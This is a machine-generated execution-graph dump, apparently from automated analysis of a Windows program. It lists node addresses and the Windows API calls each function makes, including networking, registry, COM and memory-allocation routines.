                                        execution_graph 89118 39c05b 89119 39c05d 89118->89119 89122 3678ee WSAStartup 89119->89122 89121 39c066 89123 367917 gethostname gethostbyname 89122->89123 89124 3679b1 _wcscpy 89122->89124 89123->89124 89125 36793a _memmove 89123->89125 89124->89121 89126 367970 inet_ntoa 89125->89126 89130 367952 _wcscpy 89125->89130 89127 367989 _strcat 89126->89127 89131 368553 89127->89131 89128 3679a9 WSACleanup 89128->89124 89130->89128 89133 368565 _strlen 89131->89133 89134 368561 89131->89134 89132 368574 MultiByteToWideChar 89132->89134 89135 36858a 89132->89135 89133->89132 89134->89130 89138 34010a 89135->89138 89137 3685a6 MultiByteToWideChar 89137->89134 89140 340112 __calloc_impl 89138->89140 89141 34012c 89140->89141 89142 34012e std::exception::exception 89140->89142 89147 3445ec 89140->89147 89141->89137 89161 347495 RaiseException 89142->89161 89144 340158 89162 3473cb 47 API calls _free 89144->89162 89146 34016a 89146->89137 89148 344667 __calloc_impl 89147->89148 89150 3445f8 __calloc_impl 89147->89150 89168 34889e 47 API calls __getptd_noexit 89148->89168 89149 344603 89149->89150 89163 348e52 47 API calls 2 library calls 89149->89163 89164 348eb2 47 API calls 6 library calls 89149->89164 89165 341d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 89149->89165 89150->89149 89153 34462b RtlAllocateHeap 89150->89153 89156 344653 89150->89156 89159 344651 89150->89159 89153->89150 89154 34465f 89153->89154 89154->89140 89166 34889e 47 API calls __getptd_noexit 89156->89166 89167 34889e 47 API calls __getptd_noexit 89159->89167 89161->89144 89162->89146 89163->89149 89164->89149 89166->89159 89167->89154 89168->89154 89169 391edb 89174 32131c 89169->89174 89175 32133e 89174->89175 89208 321624 89175->89208 89182 32d3d2 48 API calls 89183 321388 89182->89183 89184 32d3d2 48 API calls 89183->89184 89185 321392 89184->89185 89186 32d3d2 48 API calls 89185->89186 89187 3213d8 89186->89187 89188 32d3d2 48 API calls 89187->89188 89189 3214bb 89188->89189 89221 321673 89189->89221 89259 3217e0 89208->89259 89212 321344 89213 3216db 89212->89213 89294 321867 6 API calls 89213->89294 89215 321374 89216 32d3d2 89215->89216 89217 34010a 48 API calls 89216->89217 89218 32d3f3 89217->89218 89219 34010a 48 API calls 89218->89219 89220 32137e 89219->89220 89220->89182 89222 32d3d2 48 API calls 89221->89222 89223 321683 89222->89223 89275 3217fc 89259->89275 89262 3217fc 48 API calls 89263 3217f0 89262->89263 89264 32d3d2 48 API calls 89263->89264 89265 32165b 89264->89265 89266 327e53 89265->89266 89267 327ecf 89266->89267 89268 327e5f __NMSG_WRITE 89266->89268 89286 32a2fb 89267->89286 89270 327ec7 89268->89270 89271 327e7b 89268->89271 89285 327eda 48 API calls 89270->89285 89282 32a6f8 89271->89282 89274 327e85 _memmove 89274->89212 89276 32d3d2 48 API calls 89275->89276 89277 321807 89276->89277 89278 32d3d2 48 API calls 89277->89278 89279 32180f 89278->89279 89280 32d3d2 48 API calls 89279->89280 89281 3217e8 89280->89281 89281->89262 89283 34010a 48 API calls 89282->89283 89284 32a702 89283->89284 89284->89274 89285->89274 89287 32a321 _memmove 89286->89287 89288 32a309 89286->89288 89287->89274 89288->89287 89290 32b8a7 89288->89290 89291 32b8ba 89290->89291 89293 32b8b7 _memmove 89290->89293 89292 34010a 48 API calls 89291->89292 89292->89293 89293->89287 89294->89215 89302 330ff7 89839 33e016 89302->89839 89304 33100d 89848 33e08f 89304->89848 89309 33105e 89879 32c935 89309->89879 89310 330dee 89861 32d89e 89310->89861 89311 331063 89886 36d520 86 API calls 4 library calls 89311->89886 89313 330119 89887 36d520 86 API calls 4 library calls 89313->89887 89315 330dfa 89319 32d89e 50 API calls 89315->89319 89317 39b772 89888 36d520 86 API calls 4 library calls 89317->89888 89318 32c935 48 API calls 89340 32fad8 Mailbox _memmove 89318->89340 89322 330e83 89319->89322 89320 34010a 48 API calls 89320->89340 89871 32caee 89322->89871 89324 32d3d2 48 API calls 89324->89340 89325 39b7d2 89327 32fbf1 Mailbox 89328 341b2a 52 API calls __cinit 89328->89340 89330 33103d 89330->89327 89885 36d520 86 API calls 4 library calls 89330->89885 89335 3310f1 Mailbox 89884 36d520 86 API calls 4 library calls 89335->89884 89337 35a599 InterlockedDecrement 89337->89340 89338 39b583 89883 36d520 86 API calls 4 library calls 89338->89883 89340->89309 89340->89310 89340->89311 89340->89313 89340->89315 89340->89317 89340->89318 89340->89320 89340->89322 89340->89324 89340->89327 89340->89328 89340->89330 89340->89335 89340->89337 89340->89338 89359 32f6d0 89340->89359 89431 32fa40 89340->89431 89487 33f03e 89340->89487 89490 3817aa 89340->89490 89495 379122 89340->89495 89509 381f19 89340->89509 89512 38804e 89340->89512 89526 37013f 89340->89526 89539 33ef0d 89340->89539 89582 3281c6 89340->89582 89652 3830ad 89340->89652 89706 33dd84 89340->89706 89709 380bfa 89340->89709 89712 378065 GetCursorPos GetForegroundWindow 89340->89712 89726 33f461 89340->89726 89764 3792c0 89340->89764 89782 3810e5 89340->89782 89788 3250a3 89340->89788 89793 37b74b VariantInit 89340->89793 89834 38798d 89340->89834 89860 331620 59 API calls Mailbox 89340->89860 89875 37ee52 82 API calls 2 library calls 89340->89875 89876 37ef9d 90 API calls Mailbox 89340->89876 89877 36b020 48 API calls 89340->89877 89878 37e713 411 API calls Mailbox 89340->89878 89360 32f708 89359->89360 89365 32f77b 89359->89365 89361 32f712 89360->89361 89362 39c4d5 89360->89362 89363 32f71c 89361->89363 89380 39c544 89361->89380 89367 39c4e2 89362->89367 89368 39c4f4 89362->89368 89373 39c6a4 89363->89373 89379 32f72a 89363->89379 89426 32f741 89363->89426 89364 32fa40 411 API calls 89404 32f787 89364->89404 89366 39c253 89365->89366 89365->89404 89928 36d520 86 API calls 4 library calls 89366->89928 89889 37f34f 89367->89889 89933 37c235 411 API calls Mailbox 89368->89933 89369 39c585 89381 39c590 89369->89381 89382 39c5a4 89369->89382 89376 32c935 48 API calls 89373->89376 89374 39c264 89374->89340 89375 39c507 89378 39c50b 89375->89378 89375->89426 89376->89426 89934 36d520 86 API calls 4 library calls 89378->89934 89379->89426 90034 35a599 InterlockedDecrement 89379->90034 89380->89369 89393 39c569 89380->89393 89384 37f34f 411 API calls 89381->89384 89936 37d154 48 API calls 89382->89936 89384->89426 89386 342241 48 API calls 89386->89404 89387 39c45a 89391 32c935 48 API calls 89387->89391 89389 39c7b5 89396 39c7eb 89389->89396 90056 37ef9d 90 API calls Mailbox 89389->90056 89390 39c5af 89403 39c62c 89390->89403 89415 39c5d1 89390->89415 89391->89426 89392 32f84a 89398 39c32a 89392->89398 89410 32f854 89392->89410 89935 36d520 86 API calls 4 library calls 89393->89935 89397 32d89e 50 API calls 89396->89397 89428 32f770 Mailbox 89397->89428 89929 32342c 48 API calls 89398->89929 89400 39c793 90036 3284a6 89400->90036 89961 36afce 48 API calls 89403->89961 89404->89364 89404->89386 89404->89392 89407 32f8bb 89404->89407 89414 32f9d8 89404->89414 89404->89428 89405 39c7c9 89409 3284a6 81 API calls 89405->89409 89407->89374 89407->89387 89407->89426 89930 35a599 InterlockedDecrement 89407->89930 89932 37f4df 411 API calls 89407->89932 89421 39c7d1 __NMSG_WRITE 89409->89421 89912 3314a0 89410->89912 89412 32f8ab 89412->89407 89412->89414 89931 36d520 86 API calls 4 library calls 89414->89931 89937 36a485 48 API calls 89415->89937 89416 39c63e 89962 33df08 48 API calls 89416->89962 89417 39c79b __NMSG_WRITE 89417->89389 89419 32d89e 50 API calls 89417->89419 89419->89389 89421->89396 89422 32d89e 50 API calls 89421->89422 89422->89396 89423 39c647 Mailbox 89963 36a485 48 API calls 89423->89963 89424 39c5f6 89938 3344e0 89424->89938 89426->89389 89426->89428 90035 37ee52 82 API calls 2 library calls 89426->90035 89428->89340 89429 39c663 89964 333680 89429->89964 89432 32fa60 89431->89432 89468 32fa8e Mailbox _memmove 89431->89468 89433 34010a 48 API calls 89432->89433 89433->89468 89434 341b2a 52 API calls __cinit 89434->89468 89435 33105e 89436 32c935 48 API calls 89435->89436 89451 32fbf1 Mailbox 89436->89451 89437 330119 90933 36d520 86 API calls 4 library calls 89437->90933 89440 330dee 89444 32d89e 50 API calls 89440->89444 89441 331063 90932 36d520 86 API calls 4 library calls 89441->90932 89443 330dfa 89449 32d89e 50 API calls 89443->89449 89444->89443 89445 39b772 90934 36d520 86 API calls 4 library calls 89445->90934 89446 32c935 48 API calls 89446->89468 89447 32f6d0 411 API calls 89447->89468 89452 330e83 89449->89452 89450 32d3d2 48 API calls 89450->89468 89451->89340 89455 32caee 48 API calls 89452->89455 89454 39b7d2 89463 3310f1 Mailbox 89455->89463 89457 331230 89457->89451 90931 36d520 86 API calls 4 library calls 89457->90931 89460 34010a 48 API calls 89460->89468 89461 32fa40 411 API calls 89461->89468 90930 36d520 86 API calls 4 library calls 89463->90930 89465 39b583 90929 36d520 86 API calls 4 library calls 89465->90929 89467 35a599 InterlockedDecrement 89467->89468 89468->89434 89468->89435 89468->89437 89468->89440 89468->89441 89468->89443 89468->89445 89468->89446 89468->89447 89468->89450 89468->89451 89468->89452 89468->89457 89468->89460 89468->89461 89468->89463 89468->89465 89468->89467 89469 381f19 132 API calls 89468->89469 89470 380bfa 129 API calls 89468->89470 89471 37013f 87 API calls 89468->89471 89472 33f03e 2 API calls 89468->89472 89473 3250a3 49 API calls 89468->89473 89474 3817aa 87 API calls 89468->89474 89475 378065 55 API calls 89468->89475 89476 33f461 98 API calls 89468->89476 89477 3281c6 85 API calls 89468->89477 89478 379122 91 API calls 89468->89478 89479 38798d 109 API calls 89468->89479 89480 3830ad 93 API calls 89468->89480 89481 38804e 111 API calls 89468->89481 89482 3792c0 88 API calls 89468->89482 89483 33dd84 3 API calls 89468->89483 89484 37b74b 411 API calls 89468->89484 89485 3810e5 82 API calls 89468->89485 89486 33ef0d 94 API calls 89468->89486 90924 331620 59 API calls Mailbox 89468->90924 90925 37ee52 82 API calls 2 library calls 89468->90925 90926 37ef9d 90 API calls Mailbox 89468->90926 90927 36b020 48 API calls 89468->90927 90928 37e713 411 API calls Mailbox 89468->90928 89469->89468 89470->89468 89471->89468 89472->89468 89473->89468 89474->89468 89475->89468 89476->89468 89477->89468 89478->89468 89479->89468 89480->89468 89481->89468 89482->89468 89483->89468 89484->89468 89485->89468 89486->89468 89488 33f0b5 2 API calls 89487->89488 89489 33f046 89488->89489 89489->89340 89491 3284a6 81 API calls 89490->89491 89492 3817c7 89491->89492 89493 366f5b 63 API calls 89492->89493 89494 3817d8 89493->89494 89494->89340 89496 3284a6 81 API calls 89495->89496 89497 37913f 89496->89497 89498 32cdb4 48 API calls 89497->89498 89499 379149 89498->89499 90935 37acd3 89499->90935 89501 379156 89502 37915a socket 89501->89502 89507 379182 89501->89507 89503 379184 connect 89502->89503 89504 37916d WSAGetLastError 89502->89504 89505 3791a3 WSAGetLastError 89503->89505 89503->89507 89504->89507 90941 36d7e4 89505->90941 89507->89340 89508 3791b8 closesocket 89508->89507 90956 3823c5 89509->90956 91040 3219ee 89512->91040 89517 38806f 89520 32ca8e 48 API calls 89517->89520 89518 388091 89519 32d3d2 48 API calls 89518->89519 89521 38809a 89519->89521 89525 38808f Mailbox 89520->89525 91066 35e2e8 89521->91066 89523 3880aa 91082 327bef 89523->91082 89525->89340 89527 370157 89526->89527 89528 37015e 89526->89528 89530 3284a6 81 API calls 89527->89530 89529 3284a6 81 API calls 89528->89529 89529->89527 89531 37017c 89530->89531 91211 3676db GetFileVersionInfoSizeW 89531->91211 89533 37018d 89534 370192 89533->89534 89536 3701a3 _wcscmp 89533->89536 89535 32ca8e 48 API calls 89534->89535 89538 3701a1 89535->89538 89537 32ca8e 48 API calls 89536->89537 89537->89538 89538->89340 89540 32ca8e 48 API calls 89539->89540 89541 33ef25 89540->89541 89542 33effb 89541->89542 89543 33ef3e 89541->89543 89544 34010a 48 API calls 89542->89544 91250 33f0f3 48 API calls 89543->91250 89546 33f002 89544->89546 89547 33f00e 89546->89547 91252 325080 49 API calls 89546->91252 89549 3284a6 81 API calls 89547->89549 89554 33f01c 89549->89554 89550 33ef73 89555 33f03e 2 API calls 89550->89555 89551 33ef4d 89551->89550 89552 396942 89551->89552 89553 32cdb4 48 API calls 89551->89553 89552->89340 89557 396965 89553->89557 89558 324bf9 56 API calls 89554->89558 89556 33ef7a 89555->89556 89559 33ef87 89556->89559 89560 396980 89556->89560 89557->89550 89561 39696d 89557->89561 89562 33f02b 89558->89562 89564 32d3d2 48 API calls 89559->89564 89563 34010a 48 API calls 89560->89563 89565 32cdb4 48 API calls 89561->89565 89562->89551 89566 396936 89562->89566 89567 396986 89563->89567 89568 33ef8f 89564->89568 89565->89556 89566->89552 91253 324592 CloseHandle 89566->91253 89569 39699f 89567->89569 91254 323d65 ReadFile SetFilePointerEx 89567->91254 91227 33f04e 89568->91227 89575 3969a3 _memmove 89569->89575 91255 36ad14 48 API calls _memset 89569->91255 89573 33ef9e 89573->89575 89576 327bef 48 API calls 89573->89576 89577 33efb2 Mailbox 89576->89577 89578 33eff2 89577->89578 89579 3250ec CloseHandle 89577->89579 89578->89340 89580 33efe4 89579->89580 91251 324592 CloseHandle 89580->91251 89583 3284a6 81 API calls 89582->89583 89584 3281e5 89583->89584 89585 3284a6 81 API calls 89584->89585 89586 3281fa 89585->89586 89587 3284a6 81 API calls 89586->89587 89588 32820d 89587->89588 89589 3284a6 81 API calls 89588->89589 89590 328223 89589->89590 89591 327b6e 48 API calls 89590->89591 89592 328237 89591->89592 89593 32cdb4 48 API calls 89592->89593 89647 32846a 89592->89647 89594 32825e 89593->89594 89595 39d752 89594->89595 89620 328281 __wopenfile 89594->89620 89594->89647 89598 323320 48 API calls 89595->89598 89596 39d95f 89599 323320 48 API calls 89596->89599 89597 39d91e 89600 323320 48 API calls 89597->89600 89602 39d769 89598->89602 89603 39d96a 89599->89603 89601 39d928 89600->89601 89604 3284a6 81 API calls 89601->89604 89628 39d790 89602->89628 91307 332320 50 API calls 89602->91307 91312 332320 50 API calls 89603->91312 89606 39d93a 89604->89606 89610 3280ea 48 API calls 89606->89610 89608 3284a6 81 API calls 89611 328306 89608->89611 89609 39d985 89619 3284a6 81 API calls 89609->89619 89613 39d94e 89610->89613 89614 3284a6 81 API calls 89611->89614 89612 3280ea 48 API calls 89612->89628 89617 328182 48 API calls 89613->89617 89618 32831b 89614->89618 89615 39d7ed 89627 323320 48 API calls 89615->89627 89615->89647 89616 328182 48 API calls 89616->89628 89621 39d95c 89617->89621 89618->89615 89625 328342 89618->89625 89618->89647 89622 39d9a0 89619->89622 89620->89608 89620->89615 89640 328364 89620->89640 89620->89647 91313 332320 50 API calls 89621->91313 89623 3280ea 48 API calls 89622->89623 89626 39d9b4 89623->89626 91291 323320 89625->91291 89632 328182 48 API calls 89626->89632 89633 39d84a 89627->89633 89628->89612 89628->89616 89634 32843f Mailbox 89628->89634 91308 332320 50 API calls 89628->91308 89631 32834c 89635 32c4cd 48 API calls 89631->89635 89632->89621 91309 332320 50 API calls 89633->91309 89634->89340 89635->89640 89640->89634 89641 39d895 89640->89641 91279 3280ea 89640->91279 91302 34247b 59 API calls 2 library calls 89640->91302 91303 328182 89640->91303 91306 332320 50 API calls 89640->91306 89642 39d8ce 89641->89642 89644 39d8bf 89641->89644 89643 328182 48 API calls 89642->89643 89646 39d8dc 89643->89646 91310 32bd2f 48 API calls _memmove 89644->91310 91311 332320 50 API calls 89646->91311 89647->89596 89647->89597 89649 39d8ee 89651 32c4cd 48 API calls 89649->89651 89651->89647 89653 32ca8e 48 API calls 89652->89653 89654 3830ca 89653->89654 89655 32d3d2 48 API calls 89654->89655 89656 3830d3 89655->89656 89657 32d3d2 48 API calls 89656->89657 89658 3830dc 89657->89658 89659 32d3d2 48 API calls 89658->89659 89660 3830e5 89659->89660 89661 3284a6 81 API calls 89660->89661 89662 3830f4 89661->89662 89663 383d7b 48 API calls 89662->89663 89664 383128 89663->89664 89665 383af7 49 API calls 89664->89665 89666 383159 89665->89666 89667 38319c RegOpenKeyExW 89666->89667 89668 383172 RegConnectRegistryW 89666->89668 89676 38315d Mailbox 89666->89676 89670 3831c5 89667->89670 89671 3831f7 89667->89671 89668->89667 89668->89676 89674 3831d9 RegCloseKey 89670->89674 89670->89676 89672 3284a6 81 API calls 89671->89672 89673 383207 RegQueryValueExW 89672->89673 89675 38323e 89673->89675 89704 383229 89673->89704 89674->89676 89677 38344c 89675->89677 89678 383265 89675->89678 89675->89704 89676->89340 89681 34010a 48 API calls 89677->89681 89679 3833d9 89678->89679 89680 38326e 89678->89680 91317 36ad14 48 API calls _memset 89679->91317 89684 383279 89680->89684 89685 38338d 89680->89685 89686 383464 89681->89686 89682 3834eb RegCloseKey 89682->89676 89687 3834fe RegCloseKey 89682->89687 89689 3832de 89684->89689 89690 38327e 89684->89690 89691 3284a6 81 API calls 89685->89691 89692 3284a6 81 API calls 89686->89692 89687->89676 89688 3833e4 89693 3284a6 81 API calls 89688->89693 89695 34010a 48 API calls 89689->89695 89698 3284a6 81 API calls 89690->89698 89690->89704 89694 3833a1 RegQueryValueExW 89691->89694 89696 383479 RegQueryValueExW 89692->89696 89697 3833f6 RegQueryValueExW 89693->89697 89694->89704 89699 3832f7 89695->89699 89696->89704 89705 383331 89696->89705 89697->89682 89697->89704 89700 38329f RegQueryValueExW 89698->89700 89701 3284a6 81 API calls 89699->89701 89700->89704 89702 38330c RegQueryValueExW 89701->89702 89702->89704 89702->89705 89703 32ca8e 48 API calls 89703->89704 89704->89682 89705->89703 91318 33dd92 GetFileAttributesW 89706->91318 91323 37f79f 89709->91323 89711 380c0a 89711->89340 91398 376b19 89712->91398 89715 3780a5 89716 323320 48 API calls 89715->89716 89717 3780b3 89716->89717 91403 332320 50 API calls 89717->91403 89719 378102 89720 32cdb4 48 API calls 89719->89720 89725 3780f5 89719->89725 89722 37812b 89720->89722 89721 3780cf 91404 332320 50 API calls 89721->91404 89724 32cdb4 48 API calls 89722->89724 89722->89725 89724->89725 89725->89340 89727 33f47f 89726->89727 89728 33f48a 89726->89728 89729 32cdb4 48 API calls 89727->89729 89732 3284a6 81 API calls 89728->89732 89762 33f498 Mailbox 89728->89762 89729->89728 89730 34010a 48 API calls 89731 33f49f 89730->89731 89733 33f4af 89731->89733 91405 325080 49 API calls 89731->91405 89734 396841 89732->89734 89737 3284a6 81 API calls 89733->89737 89736 34297d __wsplitpath 47 API calls 89734->89736 89738 396859 89736->89738 89739 33f4bf 89737->89739 89740 32caee 48 API calls 89738->89740 89742 324bf9 56 API calls 89739->89742 89741 39686a 89740->89741 91406 3239e8 48 API calls 2 library calls 89741->91406 89744 33f4ce 89742->89744 89746 3968d4 GetLastError 89744->89746 89756 33f4d6 89744->89756 89745 396878 89747 396895 89745->89747 91407 366f4b GetFileAttributesW FindFirstFileW FindClose 89745->91407 89748 3968ed 89746->89748 89750 32cdb4 48 API calls 89747->89750 89748->89756 91408 324592 CloseHandle 89748->91408 89750->89762 89751 33f4f0 89753 34010a 48 API calls 89751->89753 89752 396920 89754 34010a 48 API calls 89752->89754 89757 33f4f5 89753->89757 89758 396925 89754->89758 89755 396888 89755->89747 89761 366d6d 52 API calls 89755->89761 89756->89751 89756->89752 89760 32197e 48 API calls 89757->89760 89763 33f50a Mailbox 89760->89763 89761->89747 89762->89730 89762->89763 89763->89340 89765 32a6d4 48 API calls 89764->89765 89766 3792d2 89765->89766 89767 3284a6 81 API calls 89766->89767 89768 3792e1 89767->89768 89769 33f26b 50 API calls 89768->89769 89770 3792ed gethostbyname 89769->89770 89771 37931d _memmove 89770->89771 89772 3792fa WSAGetLastError 89770->89772 89774 37932d inet_ntoa 89771->89774 89773 37930e 89772->89773 89776 32ca8e 48 API calls 89773->89776 91409 37adca 48 API calls 2 library calls 89774->91409 89781 37931b Mailbox 89776->89781 89777 379342 91410 37ae5a 50 API calls 89777->91410 89779 37934e 89780 327bef 48 API calls 89779->89780 89780->89781 89781->89340 89783 3284a6 81 API calls 89782->89783 89784 3810fb LoadLibraryW 89783->89784 89785 38111e 89784->89785 89787 38110f 89784->89787 89785->89787 91411 3828d9 48 API calls _memmove 89785->91411 89787->89340 89789 34010a 48 API calls 89788->89789 89790 3250b3 89789->89790 89791 3250ec CloseHandle 89790->89791 89792 3250be 89791->89792 89792->89340 89794 32ca8e 48 API calls 89793->89794 89795 37b7a3 CoInitialize 89794->89795 89796 37b7ae CoUninitialize 89795->89796 89798 37b7b4 89795->89798 89796->89798 89797 37b7d5 89800 37b81b 89797->89800 89802 3284a6 81 API calls 89797->89802 89798->89797 89799 32ca8e 48 API calls 89798->89799 89799->89797 89801 3284a6 81 API calls 89800->89801 89803 37b827 89801->89803 89804 37b7ef 89802->89804 89807 37b9d3 SetErrorMode CoGetInstanceFromFile 89803->89807 89819 37b861 89803->89819 91412 35a857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 89804->91412 89806 37b802 89806->89800 89808 37b807 89806->89808 89810 37ba1f CoGetObject 89807->89810 89811 37ba19 SetErrorMode 89807->89811 91413 37c235 411 API calls Mailbox 89808->91413 89809 37b8a8 GetRunningObjectTable 89813 37b8cb 89809->89813 89814 37b8b8 89809->89814 89810->89811 89816 37baa8 89810->89816 89831 37b9b1 89811->89831 91414 37c235 411 API calls Mailbox 89813->91414 89814->89813 89833 37b8ed 89814->89833 91418 37c235 411 API calls Mailbox 89816->91418 89817 37bad0 VariantClear 89817->89340 89819->89809 89823 37b89a 89819->89823 89826 32cdb4 48 API calls 89819->89826 89821 37ba53 89825 37ba6f 89821->89825 91416 35ac4b 51 API calls Mailbox 89821->91416 89822 37b814 Mailbox 89822->89817 89823->89809 89824 37bac2 SetErrorMode 89824->89822 91417 36a6f6 103 API calls 89825->91417 89829 37b88a 89826->89829 89829->89823 89830 32cdb4 48 API calls 89829->89830 89830->89823 89831->89816 89831->89821 89833->89831 91415 35ac4b 51 API calls Mailbox 89833->91415 89835 3219ee 83 API calls 89834->89835 89836 38799b 89835->89836 89837 321dce 107 API calls 89836->89837 89838 3879a4 89837->89838 89838->89340 89840 33e022 89839->89840 89841 33e034 89839->89841 89842 32d89e 50 API calls 89840->89842 89843 33e063 89841->89843 89844 33e03a 89841->89844 89847 33e02c 89842->89847 89846 32d89e 50 API calls 89843->89846 89845 34010a 48 API calls 89844->89845 89845->89847 89846->89847 89847->89304 89849 327b6e 48 API calls 89848->89849 89850 33e0b4 _wcscmp 89849->89850 89851 32caee 48 API calls 89850->89851 89854 33e0e2 Mailbox 89850->89854 89852 39b9c7 89851->89852 91419 327b4b 48 API calls Mailbox 89852->91419 89854->89340 89855 39b9d5 89856 32d2d2 53 API calls 89855->89856 89857 39b9e7 89856->89857 89858 32d89e 50 API calls 89857->89858 89859 39b9ec Mailbox 89857->89859 89858->89859 89859->89340 89860->89340 89862 32d8ac 89861->89862 89869 32d8db Mailbox 89861->89869 89863 32d8ff 89862->89863 89867 32d8b2 Mailbox 89862->89867 89866 32c935 48 API calls 89863->89866 89864 394e9b 89864->89869 91420 35a599 InterlockedDecrement 89864->91420 89865 32d8c7 89868 394e72 VariantClear 89865->89868 89865->89869 89866->89869 89867->89864 89867->89865 89868->89869 89869->89315 89872 32cafd __NMSG_WRITE _memmove 89871->89872 89873 34010a 48 API calls 89872->89873 89874 32cb3b 89873->89874 89874->89335 89875->89340 89876->89340 89877->89340 89878->89340 89880 32c940 89879->89880 89881 32c948 89879->89881 89882 32d805 48 API calls 89880->89882 89881->89327 89882->89881 89883->89335 89884->89327 89885->89311 89886->89313 89887->89317 89888->89325 89890 32d3d2 48 API calls 89889->89890 89891 37f389 Mailbox 89890->89891 89892 37f3e1 89891->89892 89893 37f3cd 89891->89893 89908 37f3a9 89891->89908 89896 32c935 48 API calls 89892->89896 89895 327e53 48 API calls 89893->89895 89894 32d89e 50 API calls 89911 37f421 Mailbox 89894->89911 89897 37f3df 89895->89897 89896->89897 89903 37f429 89897->89903 90063 37cdb5 411 API calls 89897->90063 89899 37f410 89902 37f414 89899->89902 89899->89903 89901 37f44b 89905 37f457 89901->89905 89906 37f4a2 89901->89906 90064 36d338 86 API calls 4 library calls 89902->90064 90057 37cd12 89903->90057 89905->89908 89909 37f476 89905->89909 89907 37f34f 411 API calls 89906->89907 89907->89911 89908->89894 90065 32ca8e 89909->90065 89911->89426 89913 331606 89912->89913 89916 3314b2 89912->89916 89913->89412 89914 3314be 89919 3314c9 89914->89919 90148 32346e 48 API calls 89914->90148 89916->89914 89917 34010a 48 API calls 89916->89917 89918 395299 89917->89918 89920 34010a 48 API calls 89918->89920 89921 33156d 89919->89921 89922 34010a 48 API calls 89919->89922 89927 3952a4 89920->89927 89921->89412 89923 3315af 89922->89923 89924 3315c2 89923->89924 90147 33d6b4 48 API calls 89923->90147 89924->89412 89926 34010a 48 API calls 89926->89927 89927->89914 89927->89926 89928->89374 89929->89407 89930->89407 89931->89428 89932->89407 89933->89375 89934->89428 89935->89428 89936->89390 89937->89424 89939 334537 89938->89939 89940 33469f 89938->89940 89941 334543 89939->89941 89942 397820 89939->89942 89943 32caee 48 API calls 89940->89943 90149 334040 89941->90149 90321 37e713 411 API calls Mailbox 89942->90321 89950 3345e4 Mailbox 89943->89950 89946 39782c 89947 334639 Mailbox 89946->89947 90322 36d520 86 API calls 4 library calls 89946->90322 89947->89426 89949 334559 89949->89946 89949->89947 89949->89950 89951 381f19 132 API calls 89950->89951 90164 38352a 89950->90164 90252 3795af WSAStartup 89950->90252 90254 371080 89950->90254 90257 33f55e 89950->90257 90266 36dce9 89950->90266 90271 36efcd 89950->90271 90305 3250ec 89950->90305 90309 379500 89950->90309 90318 376fc3 89950->90318 89951->89947 89961->89416 89962->89423 89963->89429 90880 32a9a0 89964->90880 89966 3336e7 89967 39a269 89966->89967 89968 333778 89966->89968 90030 333aa8 89966->90030 90897 36d520 86 API calls 4 library calls 89967->90897 90892 33bc04 86 API calls 89968->90892 89972 39a68d 89972->90030 90918 36d520 86 API calls 4 library calls 89972->90918 89974 333793 89974->89972 90012 33396b Mailbox _memmove 89974->90012 89974->90030 90885 3210e8 89974->90885 89978 39a289 90022 39a3e9 89978->90022 90898 32d2d2 89978->90898 89979 39a583 89981 32fa40 411 API calls 89979->89981 89980 39a45c 90912 36d520 86 API calls 4 library calls 89980->90912 89984 39a5b5 89981->89984 89992 32d380 55 API calls 89984->89992 89984->90030 89987 39a40f 90909 33cf79 49 API calls 89987->90909 89988 39a303 90001 39a317 89988->90001 90011 39a341 89988->90011 89990 33384e 89995 39a60c 89990->89995 89996 3338e5 89990->89996 89990->90012 89997 39a5e6 89992->89997 90917 36d231 50 API calls 89995->90917 90002 34010a 48 API calls 89996->90002 90916 36d520 86 API calls 4 library calls 89997->90916 89998 32fa40 411 API calls 89998->90012 90000 39a42c 90004 39a44d 90000->90004 90005 39a441 90000->90005 90904 36d520 86 API calls 4 library calls 90001->90904 90015 3338ec 90002->90015 90003 33bc5c 48 API calls 90003->90012 90911 36d520 86 API calls 4 library calls 90004->90911 90910 36d520 86 API calls 4 library calls 90005->90910 90007 33399f 90023 32c935 48 API calls 90007->90023 90024 3339c0 90007->90024 90013 39a366 90011->90013 90017 39a384 90011->90017 90012->89978 90012->89979 90012->89980 90012->89997 90012->89998 90012->90003 90012->90007 90014 32d89e 50 API calls 90012->90014 90026 34010a 48 API calls 90012->90026 90012->90030 90893 32d500 53 API calls __cinit 90012->90893 90894 32d420 53 API calls 90012->90894 90895 33baef 48 API calls _memmove 90012->90895 90913 37d21a 82 API calls Mailbox 90012->90913 90914 3689e0 53 API calls 90012->90914 90915 32d772 55 API calls 90012->90915 90905 37f211 411 API calls 90013->90905 90014->90012 90015->90007 90018 39a37a 90017->90018 90906 37f4df 411 API calls 90017->90906 90018->90030 90908 36d520 86 API calls 4 library calls 90022->90908 90023->90024 90027 39a65e 90024->90027 90029 333a05 90024->90029 90024->90030 90026->90012 90028 32d89e 50 API calls 90027->90028 90028->89972 90029->89972 90029->90030 90031 333a95 90029->90031 90033 333ab5 Mailbox 90030->90033 90896 36d520 86 API calls 4 library calls 90030->90896 90032 32d89e 50 API calls 90031->90032 90032->90030 90033->89426 90034->89426 90035->89400 90037 3284be 90036->90037 90054 3284ba 90036->90054 90038 395592 __i64tow 90037->90038 90039 3284d2 90037->90039 90040 395494 90037->90040 90049 3284ea __itow Mailbox _wcscpy 90037->90049 90922 34234b 80 API calls 3 library calls 90039->90922 90042 39557a 90040->90042 90043 39549d 90040->90043 90923 34234b 80 API calls 3 library calls 90042->90923 90047 3954bc 90043->90047 90043->90049 90044 34010a 48 API calls 90046 3284f4 90044->90046 90050 32caee 48 API calls 90046->90050 90046->90054 90048 34010a 48 API calls 90047->90048 90051 3954d9 90048->90051 90049->90044 90050->90054 90052 34010a 48 API calls 90051->90052 90053 3954ff 90052->90053 90053->90054 90055 32caee 48 API calls 90053->90055 90054->89417 90055->90054 90056->89405 90058 37cd21 90057->90058 90062 37cd46 90057->90062 90059 32ca8e 48 API calls 90058->90059 90060 37cd2d 90059->90060 90079 37c8b7 90060->90079 90062->89901 90063->89899 90064->89911 90066 32cad0 90065->90066 90069 32ca9a 90065->90069 90067 32cae3 90066->90067 90068 32cad9 90066->90068 90143 32c4cd 90067->90143 90070 327e53 48 API calls 90068->90070 90072 34010a 48 API calls 90069->90072 90076 32cac6 90070->90076 90073 32caad 90072->90073 90074 394f11 90073->90074 90075 32cab8 90073->90075 90074->90076 90077 32d3d2 48 API calls 90074->90077 90075->90076 90078 32caee 48 API calls 90075->90078 90076->89911 90077->90076 90078->90076 90081 37c8f7 90079->90081 90082 37c914 90079->90082 90081->90082 90083 37cc61 90081->90083 90084 37c934 90081->90084 90137 37c235 411 API calls Mailbox 